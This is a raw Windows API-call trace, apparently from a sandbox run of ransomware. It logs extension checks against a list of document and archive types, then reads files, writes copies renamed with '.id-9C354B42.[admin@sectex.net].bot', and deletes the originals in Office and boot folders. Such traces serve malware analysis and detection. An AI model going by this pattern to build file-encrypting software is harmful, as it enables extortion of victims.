	[0137.700] lstrlenW (lpString=".zip") returned 4
	[0137.700] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.700] lstrlenW (lpString=".rar") returned 4
	[0137.700] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.701] lstrlenW (lpString=".bz2") returned 4
	[0137.701] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.701] lstrlenW (lpString=".7z") returned 3
	[0137.701] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.701] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0137.701] lstrlenW (lpString=".dbf") returned 4
	[0137.701] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.701] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0137.701] lstrlenW (lpString=".1cd") returned 4
	[0137.701] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.701] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0137.701] lstrlenW (lpString=".jpg") returned 4
	[0137.701] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.701] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0137.701] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0137.701] lstrlenW (lpString=".doc") returned 4
	[0137.701] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.701] lstrlenW (lpString=".docx") returned 5
	[0137.701] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.701] lstrlenW (lpString=".pdf") returned 4
	[0137.701] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.701] lstrlenW (lpString=".xls") returned 4
	[0137.701] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.701] lstrlenW (lpString=".xlsx") returned 5
	[0137.701] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.701] lstrlenW (lpString=".ppt") returned 4
	[0137.701] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.701] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0137.701] lstrlenW (lpString=".zip") returned 4
	[0137.701] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.701] lstrlenW (lpString=".rar") returned 4
	[0137.701] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.701] lstrlenW (lpString=".bz2") returned 4
	[0137.702] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.702] lstrlenW (lpString=".7z") returned 3
	[0137.702] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.702] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0137.702] lstrlenW (lpString=".dbf") returned 4
	[0137.702] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.702] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0137.702] lstrlenW (lpString=".1cd") returned 4
	[0137.702] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.702] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29
	[0137.702] lstrlenW (lpString=".jpg") returned 4
	[0137.702] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.702] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0137.702] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0137.702] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298
	[0137.702] GetFileSizeEx (in: hFile=0x298, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=91712) returned 1
	[0137.702] CloseHandle (hObject=0x298) returned 1
	[0137.702] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20
	[0137.702] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.703] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.703] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0137.703] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0137.703] lstrlenW (lpString=".doc") returned 4
	[0137.703] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.703] lstrlenW (lpString=".docx") returned 5
	[0137.703] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.703] lstrlenW (lpString=".pdf") returned 4
	[0137.703] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.703] lstrlenW (lpString=".xls") returned 4
	[0137.703] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.703] lstrlenW (lpString=".xlsx") returned 5
	[0137.703] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.703] lstrlenW (lpString=".ppt") returned 4
	[0137.703] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.703] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0137.703] lstrlenW (lpString=".zip") returned 4
	[0137.703] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.703] lstrlenW (lpString=".rar") returned 4
	[0137.703] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.703] lstrlenW (lpString=".bz2") returned 4
	[0137.703] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.703] lstrlenW (lpString=".7z") returned 3
	[0137.703] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.703] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0137.703] lstrlenW (lpString=".dbf") returned 4
	[0137.703] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.703] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0137.703] lstrlenW (lpString=".1cd") returned 4
	[0137.703] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.703] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0137.703] lstrlenW (lpString=".jpg") returned 4
	[0137.704] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.704] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0137.704] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0137.704] lstrlenW (lpString=".doc") returned 4
	[0137.704] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.704] lstrlenW (lpString=".docx") returned 5
	[0137.704] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.704] lstrlenW (lpString=".pdf") returned 4
	[0137.704] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.704] lstrlenW (lpString=".xls") returned 4
	[0137.704] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.704] lstrlenW (lpString=".xlsx") returned 5
	[0137.704] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.704] lstrlenW (lpString=".ppt") returned 4
	[0137.704] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.704] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0137.704] lstrlenW (lpString=".zip") returned 4
	[0137.704] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.704] lstrlenW (lpString=".rar") returned 4
	[0137.704] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.704] lstrlenW (lpString=".bz2") returned 4
	[0137.704] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.704] lstrlenW (lpString=".7z") returned 3
	[0137.704] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.704] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0137.704] lstrlenW (lpString=".dbf") returned 4
	[0137.704] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.704] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0137.704] lstrlenW (lpString=".1cd") returned 4
	[0137.704] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.704] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0137.704] lstrlenW (lpString=".jpg") returned 4
	[0137.704] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.705] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0137.705] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0137.705] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298
	[0137.705] GetFileSizeEx (in: hFile=0x298, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=94800) returned 1
	[0137.705] CloseHandle (hObject=0x298) returned 1
	[0137.705] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20
	[0137.705] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.705] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.705] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29
	[0137.705] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29
	[0137.705] lstrlenW (lpString=".doc") returned 4
	[0137.705] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.705] lstrlenW (lpString=".docx") returned 5
	[0137.706] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.706] lstrlenW (lpString=".pdf") returned 4
	[0137.706] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.706] lstrlenW (lpString=".xls") returned 4
	[0137.706] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.706] lstrlenW (lpString=".xlsx") returned 5
	[0137.706] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.706] lstrlenW (lpString=".ppt") returned 4
	[0137.706] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.706] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29
	[0137.706] lstrlenW (lpString=".zip") returned 4
	[0137.706] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.706] lstrlenW (lpString=".rar") returned 4
	[0137.706] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.706] lstrlenW (lpString=".bz2") returned 4
	[0137.706] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.706] lstrlenW (lpString=".7z") returned 3
	[0137.706] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0138.657] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.661] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.662] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.679] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.680] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.680] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.685] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.687] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.689] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.363] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0140.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0140.139] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.139] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0140.186] GetLastError () returned 0x0
	[0140.188] ReadFile (in: hFile=0x3a8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x1cd8, lpOverlapped=0x0) returned 1
	[0140.260] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x1ce0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x1ce0, lpOverlapped=0x0) returned 1
	[0140.269] ReadFile (in: hFile=0x3a8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.269] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0140.269] SetEndOfFile (hFile=0x3ac) returned 1
	[0140.303] CloseHandle (hObject=0x3ac) returned 1
	[0140.304] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.304] SetEndOfFile (hFile=0x3a8) returned 1
	[0140.312] CloseHandle (hObject=0x3a8) returned 1
	[0140.312] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.338] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid")) returned 1
	[0140.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62
	[0140.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62
	[0140.338] lstrlenW (lpString=".doc") returned 4
	[0140.338] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.338] lstrlenW (lpString=".docx") returned 5
	[0140.338] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.338] lstrlenW (lpString=".pdf") returned 4
	[0140.338] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.338] lstrlenW (lpString=".xls") returned 4
	[0140.338] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.338] lstrlenW (lpString=".xlsx") returned 5
	[0140.338] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.338] lstrlenW (lpString=".ppt") returned 4
	[0140.338] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62
	[0140.338] lstrlenW (lpString=".zip") returned 4
	[0140.338] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.338] lstrlenW (lpString=".rar") returned 4
	[0140.338] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.338] lstrlenW (lpString=".bz2") returned 4
	[0140.338] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.339] lstrlenW (lpString=".7z") returned 3
	[0140.339] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62
	[0140.339] lstrlenW (lpString=".dbf") returned 4
	[0140.339] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62
	[0140.339] lstrlenW (lpString=".1cd") returned 4
	[0140.339] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62
	[0140.339] lstrlenW (lpString=".jpg") returned 4
	[0140.339] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62
	[0140.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62
	[0140.339] lstrlenW (lpString=".doc") returned 4
	[0140.339] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.339] lstrlenW (lpString=".docx") returned 5
	[0140.339] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.339] lstrlenW (lpString=".pdf") returned 4
	[0140.339] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.339] lstrlenW (lpString=".xls") returned 4
	[0140.339] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.339] lstrlenW (lpString=".xlsx") returned 5
	[0140.339] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.339] lstrlenW (lpString=".ppt") returned 4
	[0140.339] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62
	[0140.339] lstrlenW (lpString=".zip") returned 4
	[0140.339] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.339] lstrlenW (lpString=".rar") returned 4
	[0140.339] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.339] lstrlenW (lpString=".bz2") returned 4
	[0140.339] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.339] lstrlenW (lpString=".7z") returned 3
	[0140.339] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62
	[0140.340] lstrlenW (lpString=".dbf") returned 4
	[0140.340] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62
	[0140.340] lstrlenW (lpString=".1cd") returned 4
	[0140.340] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62
	[0140.340] lstrlenW (lpString=".jpg") returned 4
	[0140.340] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.340] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.340] lstrlenW (lpString="NBOOK_01.MID") returned 12
	[0140.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.613] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=5968) returned 1
	[0140.613] CloseHandle (hObject=0x3a0) returned 1
	[0140.613] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid")) returned 0x20
	[0140.628] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.628] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.628] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0140.629] GetLastError () returned 0x0
	[0140.629] ReadFile (in: hFile=0x398, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x1750, lpOverlapped=0x0) returned 1
	[0140.669] WriteFile (in: hFile=0x384, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x1760, lpOverlapped=0x0) returned 1
